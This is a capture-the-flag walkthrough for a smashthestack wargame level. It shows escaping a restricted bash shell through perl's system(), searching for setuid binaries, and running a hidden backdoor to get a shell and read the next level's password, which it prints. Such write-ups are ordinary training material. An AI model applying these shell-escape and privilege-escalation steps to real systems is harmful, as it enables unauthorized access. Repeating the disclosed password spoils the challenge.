We are now logging in with level3 on blowfish.smashthestack.org. When we enter we see that we are in a restricted environment and have to try and break out. There aren't a lot of commands we can use, so I tabbed to see which were available and which might help us break out the shell.
So I tabbed twice and got these possible commands to execute:
: builtin done fg let set typeset
! caller echo fi local shift ulimit
./ case elif for logout shopt umask
[ cd else function perl source unalias
[[ command enable getopts popd suspend unset
]] compgen esac hash printf test until
{ complete eval help pushd then wait
} continue exec history pwd time while
alias declare exit if read times
bg dirs export in readonly trap
bind disown false jobs return true
break do fc kill select type
As u see we have perl at our service which makes a great candicate to start executing system commands. I first tried by using backticks, but this didn't work, I haven't got a clue why. Then I tried to execute the command used in level 2 with system:
perl -e "system('/usr/bin/find / -perm -4000');"
This returned:
/usr/bin/find: `/root': Permission denied /usr/bin/find: `/var/cache/ldconfig': Permission denied /usr/bin/find: `/var/spool/cron/crontabs': Permission denied /var/local/. level4_backdoor /var/opt/.level3_backdoor /usr/bin/find: `/home': Permission denied /usr/bin/find: `/proc': Permission denied /usr/bin/find: `/etc': Permission denied /levels/level13 /levels/level11 /levels/level12 /levels/level4 /levels/level7 /levels/level8 /levels/level10 /levels/level5 /levels/level9 /levels/level6 /usr/bin/find: `/boot': Permission denied /usr/bin/find: `/tmp': Permission denied /bin/su
We see the
/var/local/. level4_backdoor
which has spaces. We need to escape the spaces so I executed the same perl command containing the binary with the escaped spaces:
perl -e "system('/var/local/.\ \ \ \ \ \ level4_backdoor');"
We get a shell, YAY. So all that's left is to do:
sh-3.2$ cat /pass/level4 n3xt_l3v3l!
Off to level 4.
